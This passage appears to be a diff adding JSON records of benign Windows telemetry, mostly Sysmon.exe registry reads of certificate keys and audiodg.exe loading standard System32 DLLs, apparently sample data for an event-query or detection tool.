"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975740000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "audiodg.exe", + "image_path": "C:\\Windows\\System32\\audiodg.exe", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": 
"C:\\Windows\\System32\\combase.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975890000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "devobj.dll", + "image_path": "C:\\Windows\\System32\\devobj.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "MMDevAPI.dll", + "image_path": "C:\\Windows\\System32\\MMDevAPI.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975890000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": 
"image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976050000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 
2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": 
"C:\\Windows\\System32\\clbcatq.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_value": "Journal", + "timestamp": 131883573976210000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", + "registry_value": "Render", + "timestamp": 131883573976210000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976360000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573976360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976360000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "AudioSes.dll", + "image_path": "C:\\Windows\\System32\\AudioSes.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976360000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "avrt.dll", + "image_path": "C:\\Windows\\System32\\avrt.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976360000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
